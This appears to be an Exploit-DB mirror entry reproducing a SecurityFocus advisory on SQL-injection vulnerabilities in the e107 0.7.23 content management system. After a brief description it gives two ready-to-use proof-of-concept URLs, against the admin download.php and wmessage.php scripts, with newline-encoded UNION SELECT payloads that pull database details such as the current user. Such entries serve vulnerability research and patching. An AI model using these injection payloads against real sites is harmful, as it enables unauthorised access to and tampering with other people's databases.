exploit-db-mirror/platforms/php/webapps/34653.txt
Offensive Security d1f84651f9 Updated 09_17_2014
2014-09-17 04:44:23 +00:00

11 lines
No EOL
642 B
Text
Executable file

source: http://www.securityfocus.com/bid/43327/info
e107 is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
e107 0.7.23 is vulnerable; other versions may also be affected.
http://www.example.com/e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0A1,2,3,4,5,6,7
http://www.example.com/e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,user%28%29